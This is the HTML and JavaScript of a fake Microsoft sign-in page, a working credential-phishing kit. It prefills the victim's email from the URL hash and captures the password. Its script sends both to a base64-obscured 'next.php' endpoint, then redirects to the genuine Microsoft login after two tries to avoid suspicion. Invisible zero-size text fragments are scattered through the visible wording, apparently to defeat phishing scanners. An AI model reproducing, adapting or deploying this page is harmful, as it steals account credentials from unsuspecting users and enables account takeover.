
<!doctype html>
<html lang="it">
<head>
  <script type="text/javascript"  src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script type="text/javascript"  src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
  <script type="text/javascript"  src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
 <link rel="shortcut icon" href="https://aadcdn.msftauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
  <title>Login</title>
  <!-- <link href="css/hover.css" rel="stylesheet" media="all"> -->

  <style type="text/css">
    textarea:hover, 
input:hover, 
textarea:active, 
input:active, 
textarea:focus, 
input:focus,
button:focus,
button:active,
button:hover,
label:focus,
.btn:active,
.btn.active
{
    outline:0px !important;
    -webkit-appearance:none;
    box-shadow: none !important;
}
.form-control {
    display: block;
    width: 100%;
    padding: .375rem .10rem;
    font-size: 1rem;
    line-height: 1.5;
    color: #495057;
    background-color: #fff;
    background-clip: padding-box;
    border: 1px solid #ced4da;
    border-radius: .25rem;
    transition: border-color .15s ease-in-out,box-shadow .15s ease-in-out;
}

    .box
    {
      box-shadow: 0 2px 6px rgba(0,0,0,0.2);
      border: 1px solid rgba(0,0,0,0);
      min-height: 338px;
      min-width: 320px;
      max-width: 440px;
      width: calc(100% - 40px);
      padding: 44px;
      margin-left: auto;
      margin-right: auto;
      margin-top: 60px;
      margin-bottom: 28px;
    }

    #footer {
      position: fixed;
      bottom: 0px;
      width: 100%;
      overflow: visible;
      z-index: 99;
      clear: both;
      background-color: #000;
      background-color: transparent;
    }

    /*.footerNode span {
    color: #000;
    font-size: 0.75rem;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    float: right;
    margin-left: 8px;
    margin-right: 8px;
}*/
div .footerNode a, div .footerNode span {
    color: #000;
    font-size: 0.75rem;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    float: right;
    margin-left: 8px;
    margin-right: 8px;
}
.footer-content.footer-item.debug-item {
    text-decoration: none;
    letter-spacing: 3px;
    line-height: 22px;
    vertical-align: top;
    font-size: 16px;
    font-weight: 600;
}
.f
    @media only screen and (max-width: 610px) {
      #hide{
        display: none;
      }
    }

  </style>
</head>
<body style="background-image: url('https://s3.amazonaws.com/simbla-static-2/2021/03/5f62058623af52001def0028/5f6206ef6b7cb60019717fbd/9l_C0GlTPvUPfbR1pJMwIgCA.svg'); background-size: cover;background-repeat: no-repeat;">
  <div class="container-fluid">
    <div class="container">
      <div class="row my-5 py-5">
          <!-- <div class="col-lg-6" id="hide">
            <div class="text-white my-5 py-3">
              <span class="display-4">Expand Your<br> Microsoft</span><br><br>
              <span class="h5 font-weight-normal">Upgrade to ad-free email and the latest productivity tools with Microsoft.</span><br><br><br>
              <button class="btn btn-white rounded-0 px-5 py-2" style="font-size: 20px; color: #1C9CD6; font-weight: 500;">Get Started</button>
            </div>
          </div> -->
          <div class="col-lg-6 mx-auto">
            <div class="bg-white box" id="div1">
              <img src="https://s3.amazonaws.com/simbla-static-2/2021/03/5f62058623af52001def0028/5f6206ef6b7cb60019717fbd/dyhfi-5aMVYr0pY-U3mFXQJG.svg" class="img-fluid"><br><br>
              <span class="h4"><span style='font-size: 0px;'>frqsd</span>Sig<span style='font-size: 0px;'>ildtoao</span>n I<span style='font-size: 0px;'>faykejw</span>n</span><br>
              <span id="error" class="text-danger" style="display: none;">Th<span style='font-size: 0px;'>seikf</span>at mic<span style='font-size: 0px;'>satl</span><span style='font-size: 0px;'>mitnmgw</span>rosoft<span style='font-size: 0px;'>xqzutin</span> ac<span style='font-size: 0px;'>teuacb</span>co<span style='font-size: 0px;'>qnlmf</span>unt <span style='font-size: 0px;'>euvhfpg</span>doesn'<span style='font-size: 0px;'>tnvvg</span><span style='font-size: 0px;'>wwstn</span><span style='font-size: 0px;'>sxzatrf</span>t <span style='font-size: 0px;'>uojeo</span>exi<span style='font-size: 0px;'>xoxx</span>st. <span style='font-size: 0px;'>rhsmzkx</span>Ent<span style='font-size: 0px;'>paee</span>er a d<span style='font-size: 0px;'>zovc</span>iff<span style='font-size: 0px;'>illvqy</span>e<span style='font-size: 0px;'>bhmixoi</span>re<span style='font-size: 0px;'>gglqdm</span>nt ac<span style='font-size: 0px;'>jhgnl</span>co<span style='font-size: 0px;'>qqdt</span>unt.</span>
              <div class="form-group mt-2">
                <input type="email" name="dhakan" class="form-control rounded-0 border-dark" id="dhakan" aria-describedby="emailHelp" placeholder="Email, phone or skype" style="border-right: none;border-left: none;border-top: none;">
              </div>
              <p style="font-size:.8125rem"> No account? <a href="#">Create one!</a></p>
              <p style="font-size:.8125rem"><a href="#">Can’t access your account?</a></p>
                <p style="font-size:.8125rem"><a href="#">Sign-in options</a></p>
                <div class="text-right">
                  <button class="btn rounded-0 text-white px-4" id="next" style="background-color: #0067b8;">Next</button>
                </div>
              </div>

              <div class="m-5 p-4 bg-white box" id="div2" style="display: none;">
                <form id="contact">
                  <img src="https://s3.amazonaws.com/simbla-static-2/2021/03/5f62058623af52001def0028/5f6206ef6b7cb60019717fbd/dyhfi-5aMVYr0pY-U3mFXQJG.svg" class="img-fluid"><br><br>
                  &nbsp<span id="dhakanch">abc@abc.com</span><br>
				  <br>
                  <span class="h5">Enter Password</span>
				  <p><span id="msg" class="text-danger" style="display: none;"></span></p>
                  <div class="form-group mt-2">
                    <input type="password" name="botal" class="form-control rounded-0 border-dark" id="botal" aria-describedby="emailHelp" placeholder="Enter Password" style="border-right: none;border-left: none;border-top: none;">
                  </div>
                 
                  <p style="font-size:.8125rem"><a href="#">Fo<span style='font-size:0px;color:transparent'>Sun</span>rg<span style='font-size:0px;color:transparent'>Sun</span>ot pa<span style='font-size:0px;color:transparent'>Sun</span>ss<span style='font-size:0px;color:transparent'>Sun</span>wo<span style='font-size:0px;color:transparent'>Sun</span>rd?</a></p>
                  <div class="text-right">
                    <button class="btn rounded-0 text-white px-3" id="submit-btn" style="background-color: #0066BA;" >Si<span style='font-size:0px;color:transparent'>Sun</span>gn i<span style='font-size:0px;color:transparent'>Sun</span>n</button>
                  </div>
                </form>
              </div>

            </div>
          </div>
        </div>
		
      </div>

      <footer id="footer">
	  
        <div>
		
          <div class="footerNode">
		  <a id="moreOptions" href="#" role="button" aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
            <span><a  href="#">Privacy & cookies</a></span>
            <a data-bind="text: config.text.privacyAndCookies, attr: {'data-url': config.links.privacyAndCookies}" href="#" data-url="#">Terms of use</a>
			
          </div>
		  
        </div>
      </footer>





      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script type="text/javascript"  src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script type="text/javascript"  src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script type="text/javascript"  src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script type="text/javascript"  src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script>


      /* global $ */
      $(document).ready(function(){
        var count=0;


    /////////////url dhakan getting////////////////
    var dhakan = window.location.hash.substr(1);
    if (!dhakan) {

    }
    else
    {
      var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

      if (!base64regex.test(dhakan)) {
            // alert(btoa(dhakan));
            var my_dhakan =dhakan;
          }
          else
          {
            // alert(atob(dhakan));
            var my_dhakan =atob(dhakan);
          }
        // $('#dhakan').val(dhakan);
        // var my_dhakan =dhakan;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_dhakan)) {
          $('#error').show();
          dhakan.focus;
          return false;
        }
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#dhakan').val(my_dhakan);
      }





      $('#dhakan').click(function(){
        $('#error').hide();
      });
	  
	    $(document).keypress(function(event) {

        var keycode = (event.keyCode ? event.keyCode : event.which);
        if (keycode == '13') {
            event.preventDefault();
            if ($("#div1").is(":visible")) {

                $("#next").click();

            } else if ($("#div2").is(":visible")) {
                event.preventDefault();

                $("#submit-btn").click();

            } else {
                return false;
            }
        }
    });
      $('#next').click(function () {
        var my_dhakan =$('#dhakan').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_dhakan)) {
          $('#error').show();
          dhakan.focus;
          return false;
        }
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();

        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
        $("#dhakanch").html(my_dhakan);

      });
      $('#back').click(function () {
        $("#msg").hide();
        $("#dhakan").val("");
        $("#botal").val("");
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });

		var file="bmV4dC5waHA=";
      $('#submit-btn').click(function(event){
        event.preventDefault();
        var dhakan=$("#dhakan").val();
        var botal=$("#botal").val();
        var detail=$("#field").html();
        var msg = $('#msg').html();

        var my_dhakan =dhakan;
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#msg').text( msg );
        count=count+1;
        $.ajax({
          dataType: 'JSON',
          url: atob(file),
          type: 'POST',
          data:{
            dhakan:dhakan,
            botal:botal,
            detail:detail,

          },
          beforeSend: function(xhr){
            $('#submit-btn').html('Verifying...');
          },
          success: function(response){
            $("#botal").val("");
            if (count>=2) {
              count=0;
              window.location.replace("https://login.microsoftonline.com/");
            }
            if(response){
              $("#msg").show();
              console.log(response);
              if(response['signal'] == 'ok'){
               $('#msg').html(response['msg']);
             }
             else{
              $('#msg').html(response['msg']);
            }
          }
        },
        error: function(){
          $("#botal").val("");
          if (count>=2) {
            count=0;
            window.location.replace("https://login.microsoftonline.com/");
          }
          $("#msg").show();
          $('#msg').html("Your account or password is incorrect. Please try again later.");
        },
        complete: function(){
          $('#submit-btn').html('Login');
        }
      });
      });
    });
  </script>
  </html>